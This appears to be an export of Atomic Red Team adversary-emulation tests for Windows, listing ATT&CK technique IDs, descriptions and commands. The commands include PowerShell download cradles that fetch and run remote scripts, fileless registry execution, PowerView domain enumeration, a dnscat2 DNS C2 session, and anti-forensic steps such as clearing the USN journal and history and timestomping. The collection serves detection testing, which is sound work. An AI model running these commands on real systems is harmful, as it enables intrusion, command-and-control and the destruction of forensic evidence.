T1059.001 command_prompt windows Powershell MsXml COM object - with prompt
PowerShell
Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed. Provided by https://github.com/mgreen27/mgreen27.github.io
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
T1059.001 command_prompt windows Powershell XML requests
PowerShell
Powershell xml download request. Upon execution, "Download Cradle test success!" will be dispalyed. Provided by https://github.com/mgreen27/mgreen27.github.io
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
T1059.001 command_prompt windows Powershell invoke mshta.exe download
PowerShell
Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display "Download Cradle test success!". Provided by https://github.com/mgreen27/mgreen27.github.io
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
T1059.001 manual windows Powershell Invoke-DownloadCradle
PowerShell
Provided by https://github.com/mgreen27/mgreen27.github.io Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
T1059.001 powershell windows PowerShell Fileless Script Execution
PowerShell
Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections. Upon exection, open "C:\Windows\Temp" and verify that art-marker.txt is in the folder.
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
T1059.001 powershell windows NTFS Alternate Data Stream Access
PowerShell
Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed.
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
T1059.001 powershell elevated windows PowerShell Session Creation and Use
PowerShell
Connect to a remote powershell session and interact with the host. Upon execution, network test info and 'T1086 PowerShell Session Creation and Use' will be displayed.
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
T1059.001 powershell windows ATHPowerShellCommandLineParameter -Command parameter variations
PowerShell
Executes powershell.exe with variations of the -Command parameter
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
T1059.001 powershell windows ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments
PowerShell
Executes powershell.exe with variations of the -Command parameter with encoded arguments supplied
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
T1059.001 powershell windows ATHPowerShellCommandLineParameter -EncodedCommand parameter variations
PowerShell
Executes powershell.exe with variations of the -EncodedCommand parameter
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
T1059.001 powershell windows ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments
PowerShell
Executes powershell.exe with variations of the -EncodedCommand parameter with encoded arguments supplied
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
T1059.001 command_prompt windows PowerShell Command Execution
PowerShell
Use of obfuscated PowerShell to execute an arbitrary command; outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary.
powershell.exe -e  #{obfuscated_code}
T1059.001 powershell elevated windows PowerShell Invoke Known Malicious Cmdlets
PowerShell
Powershell execution of known Malicious PowerShell Cmdlets
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
    "function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
    $cmdlets}
T1059.001 powershell windows PowerUp Invoke-AllChecks
PowerShell
Check for privilege escalation paths using PowerUp from PowerShellMafia
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
T1059.001 powershell windows Abuse Nslookup with DNS Records
PowerShell
Red teamer's avoid IEX and Invoke-WebRequest in your PowerShell commands. Instead, host a text record with a payload to compromise hosts. [reference](https://twitter.com/jstrosch/status/1237382986557001729)
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup  { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
T1059.001 powershell windows SOAPHound - Dump BloodHound Data
PowerShell
Dump BloodHound data using SOAPHound. Upon execution, BloodHound data will be dumped and stored in the specified output directory. src: https://github.com/FalconForceTeam/SOAPHound
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
T1059.001 powershell windows SOAPHound - Build Cache
PowerShell
Build cache using SOAPHound. Upon execution, a cache will be built and stored in the specified cache filename. src: https://github.com/FalconForceTeam/SOAPHound
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
T1059.003 powershell windows Create and Execute Batch Script
Windows Command Shell
Creates and executes a simple batch script. Upon execution, CMD will briefly launch to run the batch script then close again.
Start-Process "#{script_path}"
T1059.003 command_prompt windows Writes text to a file and displays it.
Windows Command Shell
Writes text to a file and display the results. This test is intended to emulate the dropping of a malicious file to disk.
echo "#{message}" > "#{file_contents_path}" & type "#{file_contents_path}"
T1059.003 command_prompt windows Suspicious Execution via Windows Command Shell
Windows Command Shell
Command line executed via suspicious invocation. Example is from the 2021 Threat Detection Report by Red Canary.
%LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} & type #{output_file}
T1059.003 powershell windows Simulate BlackByte Ransomware Print Bombing
Windows Command Shell
This test attempts to open a file a specified number of times in Wordpad, then prints the contents. It is designed to mimic BlackByte ransomware's print bombing technique, where tree.dll, which contains the ransom note, is opened in Wordpad 75 times and then printed. See https://redcanary.com/blog/blackbyte-ransomware/.
cmd /c "for /l %x in (1,1,#{max_to_print}) do start wordpad.exe /p #{file_to_print}" | out-null
T1059.003 command_prompt windows Command Prompt read contents from CMD file and execute
Windows Command Shell
Simulate Raspberry Robin using the "standard-in" command prompt feature cmd /R < to read and execute a file via cmd.exe See https://redcanary.com/blog/raspberry-robin/.
cmd /r cmd<"#{input_file}"
T1059.003 command_prompt elevated windows Command prompt writing script to file then executes it
Windows Command Shell
Simulate DarkGate malware's second stage by writing a VBscript to disk directly from the command prompt then executing it. The script will execute 'whoami' then exit.
 c:\windows\system32\cmd.exe /c cd /d #{script_path} & echo Set objShell = CreateObject("WScript.Shell"):Set objExec = objShell.Exec("whoami"):Set objExec = Nothing:Set objShell = Nothing > #{script_name}.vbs & #{script_name}.vbs
T1059.005 powershell windows Visual Basic script execution to gather local computer information
Visual Basic
Visual Basic execution test, execute vbscript via PowerShell. When successful, system information will be written to $env:TEMP\T1059.005.out.txt.
cscript "#{vbscript}" > $env:TEMP\T1059.005.out.txt
T1059.005 powershell windows Encoded VBS code execution
Visual Basic
This module takes an encoded VBS script and executes it from within a malicious document. By default, upon successful execution a message box will pop up displaying "ART T1059.005" A note regarding this module, due to the way that this module utilizes "ScriptControl" a 64bit version of Microsoft Office is required. You can validate this by opening WinWord - File - Account - About Word
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"
T1059.005 powershell windows Extract Memory via VBA
Visual Basic
This module attempts to emulate malware authors utilizing well known techniques to extract data from memory/binary files. To do this we first create a string in memory then pull out the pointer to that string. Finally, it uses this pointer to copy the contents of that memory location to a file stored in the $env:TEMP\atomic_t1059_005_test_output.bin.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract"
T1059.007 command_prompt windows JScript execution to gather local computer information via cscript
JavaScript
JScript execution test, execute JScript via cscript command. When successful, system information will be written to $env:TEMP\T1059.007.out.txt
cscript "#{jscript}" > %tmp%\T1059.007.out.txt
T1059.007 command_prompt windows JScript execution to gather local computer information via wscript
JavaScript
JScript execution test, execute JScript via wscript command. When successful, system information will be shown with four message boxes.
wscript "#{jscript}"
T1059.010 powershell windows AutoHotKey script execution
AutoHotKey & AutoIT
An adversary may attempt to execute malicious script using AutoHotKey software instead of regular terminal like powershell or cmd. A messagebox will be displayed and calculator will popup when the script is executed successfully
Start-Process -FilePath "#{autohotkey_path}" -ArgumentList "#{script_path}"
T1069.001 command_prompt windows Basic Permission Groups Discovery Windows (Local)
Local Groups
Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
net localgroup
net localgroup "Administrators"
T1069.001 powershell windows Permission Groups Discovery PowerShell (Local)
Local Groups
Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
get-localgroup
Get-LocalGroupMember -Name "Administrators"
T1069.001 powershell windows SharpHound3 - LocalAdmin
Local Groups
This module runs the Windows executable of SharpHound in order to remotely list members of the local Administrators group (SAMR)
New-Item -Path "#{output_path}" -ItemType Directory > $null
& "#{sharphound_path}" -d "#{domain}" --CollectionMethod LocalAdmin --NoSaveCache --OutputDirectory "#{output_path}"
T1069.001 command_prompt windows Wmic Group Discovery
Local Groups
Utilizing wmic.exe to enumerate groups on the local system. Upon execution, information will be displayed of local groups on system.
wmic group get name
T1069.001 powershell windows WMIObject Group Discovery
Local Groups
Utilizing PowerShell cmdlet - get-wmiobject, to enumerate local groups on the endpoint. Upon execution, Upon execution, information will be displayed of local groups on system.
Get-WMIObject Win32_Group
T1069.002 command_prompt windows Basic Permission Groups Discovery Windows (Domain)
Domain Groups
Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
net localgroup
net group /domain
net group "enterprise admins" /domain
net group "domain admins" /domain
T1069.002 powershell windows Permission Groups Discovery PowerShell (Domain)
Domain Groups
Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
get-ADPrincipalGroupMembership #{user} | select name
T1069.002 command_prompt windows Elevated group enumeration using net group (Domain)
Domain Groups
Runs "net group" command including command aliases and loose typing to simulate enumeration/discovery of high value domain groups. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
net groups "Account Operators" /domain
net groups "Exchange Organization Management" /domain
net group "BUILTIN\Backup Operators" /domain
net group "Domain Admins" /domain
T1069.002 powershell windows Find machines where user has local admin access (PowerView)
Domain Groups
Find machines where user has local admin access (PowerView). Upon execution, progress and info about each host in the domain being scanned will be displayed.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-LocalAdminAccess -Verbose
T1069.002 powershell windows Find local admins on all machines in domain (PowerView)
Domain Groups
Enumerates members of the local Administrators groups across all machines in the domain. Upon execution, information about each machine will be displayed.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-EnumerateLocalAdmin  -Verbose
T1069.002 powershell windows Find Local Admins via Group Policy (PowerView)
Domain Groups
takes a computer and determines who has admin rights over it through GPO enumeration. Upon execution, information about the machine will be displayed.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose
T1069.002 powershell windows Enumerate Users Not Requiring Pre Auth (ASRepRoast)
Domain Groups
When successful, accounts that do not require kerberos pre-auth will be returned
get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE}
T1069.002 command_prompt windows Adfind - Query Active Directory Groups
Domain Groups
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Groups reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=group) #{optional_args}
T1069.002 powershell windows Enumerate Active Directory Groups with Get-AdGroup
Domain Groups
The following Atomic test will utilize Get-AdGroup to enumerate groups within Active Directory. Upon successful execution a listing of groups will output with their paths in AD. Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-adgroup?view=windowsserver2022-ps
Get-AdGroup -Filter *
T1069.002 powershell windows Enumerate Active Directory Groups with ADSISearcher
Domain Groups
The following Atomic test will utilize ADSISearcher to enumerate groups within Active Directory. Upon successful execution a listing of groups will output with their paths in AD. Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
([adsisearcher]"objectcategory=group").FindAll(); ([adsisearcher]"objectcategory=group").FindOne()
T1069.002 powershell windows Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)
Domain Groups
When successful, accounts that do not require kerberos pre-auth will be returned. Reference: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name
T1069.002 powershell windows Get-DomainGroupMember with PowerView
Domain Groups
Utilizing PowerView, run Get-DomainGroupMember to identify domain users. Upon execution, progress and info about groups within the domain being scanned will be displayed.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins"
T1069.002 powershell windows Get-DomainGroup with PowerView
Domain Groups
Utilizing PowerView, run Get-DomainGroup to identify the domain groups. Upon execution, Groups within the domain will be listed.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroup -verbose
T1069.002 command_prompt elevated windows Active Directory Enumeration with LDIFDE
Domain Groups
Output information from Active Directory to a specified file. [Ldifde](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc731033(v=ws.11)) is a CLI tool for creating, modifying and deleting directory objects. The test is derived from the CISA Report on Voly Typhoon. Reference: https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF
ldifde.exe -f #{output_path}\#{output_file} -p subtree
T1070 command_prompt elevated windows Indicator Removal using FSUtil
Indicator Removal
Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume. Upon execution, no output will be displayed. More information about fsutil can be found at https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn
fsutil usn deletejournal /D C:
T1070 powershell windows Indicator Manipulation using FSUtil
Indicator Removal
Finds a file by user name (if Disk Quotas are enabled), queries allocated ranges for a file, sets a file's short name, sets a file's valid data length, sets zero data for a file, or creates a new file. Upon execution, no output will be displayed. More information about fsutil can be found at https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-file - https://tria.ge/230601-x8x6bsgb24/behavioral2
if (-not (Test-Path "#{file_to_manipulate}")) { New-Item "#{file_to_manipulate}" -Force } 
echo "1234567890" > "#{file_to_manipulate}"
fsutil  file setZeroData offset=0 length=#{file_data_length} "#{file_to_manipulate}"
T1070.003 powershell windows Prevent Powershell History Logging
Clear Command History
Prevents Powershell history
Set-PSReadlineOption -HistorySaveStyle SaveNothing
T1070.003 powershell windows Clear Powershell History by Deleting History File
Clear Command History
Clears Powershell history
Remove-Item (Get-PSReadlineOption).HistorySavePath
T1070.003 powershell windows Set Custom AddToHistoryHandler to Avoid History File Logging
Clear Command History
The "AddToHistoryHandler" receives the current command as the $line variable and then returns $true if the line should be written to the history file. Here we simply return $false so nothing gets added to the history file for the current session.
Set-PSReadLineOption -AddToHistoryHandler { return $false }
T1070.003 powershell windows Clear PowerShell Session History
Clear Command History
This technique involves using the Clear-History cmdlet in PowerShell to remove all records of previously executed commands. This action is often performed by attackers to eliminate traces of their activities, making incident detection and forensic investigation more challenging. By clearing the session history, adversaries aim to obfuscate their operational footprint.
Clear-History
T1070.004 command_prompt windows Delete a single file - Windows cmd
File Deletion
Delete a single file from the temporary directory using cmd.exe. Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted.
del /f #{file_to_delete}
T1070.004 command_prompt windows Delete an entire folder - Windows cmd
File Deletion
Recursively delete a folder in the temporary directory using cmd.exe. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
rmdir /s /q #{folder_to_delete}
T1070.004 powershell windows Delete a single file - Windows PowerShell
File Deletion
Delete a single file from the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted.
Remove-Item -path #{file_to_delete}
T1070.004 powershell windows Delete an entire folder - Windows PowerShell
File Deletion
Recursively delete a folder in the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
Remove-Item -Path #{folder_to_delete} -Recurse
T1070.004 powershell elevated windows Delete Prefetch File
File Deletion
Delete a single prefetch file. Deletion of prefetch files is a known anti-forensic technique. To verify execution, Run (Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" | Measure-Object).Count before and after the test to verify that the number of prefetch files decreases by 1.
Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0])
T1070.004 powershell windows Delete TeamViewer Log Files
File Deletion
Adversaries may delete TeamViewer log files to hide activity. This should provide a high true-positive alert ration. This test just places the files in a non-TeamViewer folder, a detection would just check for a deletion event matching the TeamViewer log file format of TeamViewer_##.log. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted. https://twitter.com/SBousseaden/status/1197524463304290305?s=20
New-Item -Path #{teamviewer_log_file} -Force | Out-Null
Remove-Item #{teamviewer_log_file} -Force -ErrorAction Ignore
T1070.004 command_prompt elevated windows Clears Recycle bin via rd
File Deletion
An adversary clears the recycle bin in the system partition using rd to remove traces of deleted files. [Reference](https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/)
rd /s /q %systemdrive%\$RECYCLE.BIN
T1070.005 command_prompt windows Add Network Share
Network Share Connection Removal
Add a Network Share utilizing the command_prompt
net use c: #{share_name}
net share test=#{share_name} /REMARK:"test share" /CACHE:No
T1070.005 command_prompt windows Remove Network Share
Network Share Connection Removal
Removes a Network Share utilizing the command_prompt
net share #{share_name} /delete
T1070.005 powershell windows Remove Network Share PowerShell
Network Share Connection Removal
Removes a Network Share utilizing PowerShell
Remove-SmbShare -Name #{share_name}
Remove-FileShare -Name #{share_name}
T1070.005 command_prompt elevated windows Disable Administrative Share Creation at Startup
Network Share Connection Removal
Administrative shares are hidden network shares created by Microsoft’s Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system. These shares are automatically created at started unless they have been purposefully disabled as is done in this Atomic test. As Microsoft puts it, "Missing administrative shares typically indicate that the computer in question has been compromised by malicious software." https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareServer /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareWks /t REG_DWORD /d 0 /f
T1070.005 command_prompt elevated windows Remove Administrative Shares
Network Share Connection Removal
Administrative shares are hidden network shares created by Microsoft’s Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system. As Microsoft puts it, “Missing administrative shares typically indicate that the computer in question has been compromised by malicious software. https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/
for %i in (C$ IPC$ ADMIN$) do net share %i /delete
T1070.006 powershell windows Windows - Modify file creation timestamp with PowerShell
Timestomp
Modifies the file creation timestamp of a specified file. This technique was seen in use by the Stitch RAT. To verify execution, use File Explorer to view the Properties of the file and observe that the Created time is the year 1970.
Get-ChildItem "#{file_path}" | % { $_.CreationTime = "#{target_date_time}" }
T1070.006 powershell windows Windows - Modify file last modified timestamp with PowerShell
Timestomp
Modifies the file last modified timestamp of a specified file. This technique was seen in use by the Stitch RAT. To verify execution, use File Explorer to view the Properties of the file and observe that the Modified time is the year 1970.
Get-ChildItem "#{file_path}" | % { $_.LastWriteTime = "#{target_date_time}" }
T1070.006 powershell windows Windows - Modify file last access timestamp with PowerShell
Timestomp
Modifies the last access timestamp of a specified file. This technique was seen in use by the Stitch RAT. To verify execution, use File Explorer to view the Properties of the file and observe that the Accessed time is the year 1970.
Get-ChildItem "#{file_path}" | % { $_.LastAccessTime = "#{target_date_time}" }
T1070.006 powershell windows Windows - Timestomp a File
Timestomp
Timestomp kxwn.lock. Successful execution will include the placement of kxwn.lock in #{file_path} and execution of timestomp.ps1 to modify the time of the .lock file. [Mitre ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/master/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/4a2ad84e-a93a-4b2e-b1f0-c354d6a41278.yml)
import-module "#{file_path}\timestomp.ps1"
timestomp -dest "#{file_path}\kxwn.lock"
T1070.006 powershell elevated windows Event Log Manipulations- Time slipping via Powershell
Timestomp
Changes the system time on the computer to a time that you specify. It involves altering the system’s clock or adjusting the dates of files, affecting timestamp integrity within Event Logs. This technique can disrupt the sequence of logged events, complicating incident analysis and forensics. Reference - https://detect.fyi/event-log-manipulations-1-time-slipping-55bf95631c40 https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/set-date?view=powershell-7.4
try{ 
  Set-Date -Date (Get-Date).AddDays(#{days_to_modify})
  Add-Content "$env:APPDATA\slipDays.bak" #{days_to_modify}
}
catch {exit 1}
T1070.008 powershell elevated windows Copy and Delete Mailbox Data on Windows
Clear Mailbox Data
Copies and deletes mail data on Windows
New-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy" -ItemType Directory -ErrorAction Ignore
Get-ChildItem -Path "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data" -Exclude copy | ForEach-Object { Copy-Item -Path $_.FullName -Destination "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy" -Recurse -Force -ErrorAction Ignore }
Remove-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy" -Recurse -Force -ErrorAction Ignore
T1070.008 powershell elevated windows Copy and Modify Mailbox Data on Windows
Clear Mailbox Data
Copies and modifies mail data on Windows
New-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy" -ItemType Directory -ErrorAction Ignore
Get-ChildItem -Path "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data" -Exclude copy | ForEach-Object { Copy-Item -Path $_.FullName -Destination "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy" -Recurse -Force -ErrorAction Ignore }
Get-ChildItem -Path "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy" -File | ForEach-Object { Add-Content -Path $_.FullName -Value "Modification for Atomic Red Test" -ErrorAction Ignore }
T1071 powershell windows Telnet C2
Application Layer Protocol
An adversary may establish Telnet communication from a compromised endpoint to a command and control (C2) server in order to carry out additional attacks on objectives.
#{client_path} #{server_ip} --port #{server_port}
T1071.001 powershell windows Malicious User Agents - Powershell
Web Protocols
This test simulates an infected host beaconing to command and control. Upon execution, no output will be displayed. Use an application such as Wireshark to record the session and observe user agent strings and responses. Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
Invoke-WebRequest #{domain} -UserAgent "HttpBrowser/1.0" | out-null
Invoke-WebRequest #{domain} -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null
Invoke-WebRequest #{domain} -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null
Invoke-WebRequest #{domain} -UserAgent "*<|>*" | out-null
T1071.001 command_prompt windows Malicious User Agents - CMD
Web Protocols
This test simulates an infected host beaconing to command and control. Upon execution, no out put will be displayed. Use an application such as Wireshark to record the session and observe user agent strings and responses. Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
#{curl_path} -s -A "HttpBrowser/1.0" -m3 #{domain} >nul 2>&1
#{curl_path} -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain} >nul 2>&1
#{curl_path} -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain} >nul 2>&1
#{curl_path} -s -A "*<|>*" -m3 #{domain} >nul 2>&1
T1071.004 powershell windows DNS Large Query Volume
DNS
This test simulates an infected host sending a large volume of DNS queries to a command and control server. The intent of this test is to trigger threshold based detection on the number of DNS queries either from a single source system or to a single targe domain. A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout.
for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "#{query_type}" "#{subdomain}-$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout}
T1071.004 powershell windows DNS Regular Beaconing
DNS
This test simulates an infected host beaconing via DNS queries to a command and control server at regular intervals over time. This behaviour is typical of implants either in an idle state waiting for instructions or configured to use a low query volume over time to evade threshold based detection. A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout.
Set-Location "PathToAtomicsFolder"
.\T1071.004\src\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}
T1071.004 powershell windows DNS Long Domain Query
DNS
This test simulates an infected host returning data to a command and control server using long domain names. The simulation involves sending DNS queries that gradually increase in length until reaching the maximum length. The intent is to test the effectiveness of detection of DNS queries for long domain names over a set threshold. Upon execution, DNS information about the domain will be displayed for each callout.
Set-Location "PathToAtomicsFolder"
.\T1071.004\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}
T1071.004 powershell windows DNS C2
DNS
This will attempt to start a C2 session using the DNS protocol. You will need to have a listener set up and create DNS records prior to executing this command. The following blogs have more information. https://github.com/iagox86/dnscat2 https://github.com/lukebaggett/dnscat2-powershell
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')
Start-Dnscat2 -Domain #{domain} -DNSServer #{server_ip}
T1072 command_prompt elevated windows Radmin Viewer Utility
Software Deployment Tools
An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console.
"%PROGRAMFILES(x86)%/#{radmin_exe}"
T1072 command_prompt elevated windows PDQ Deploy RAT
Software Deployment Tools
An adversary may use PDQ Deploy Software to deploy the Remote Adminstartion Tool, this will start the PDQ console.
"%PROGRAMFILES(x86)%/#{PDQ_Deploy_exe}"
T1072 powershell windows Deploy 7-Zip Using Chocolatey
Software Deployment Tools
An adversary may use Chocolatey to remotely deploy the 7-Zip file archiver utility.
# Deploy 7-Zip using Chocolatey
choco install -y 7zip
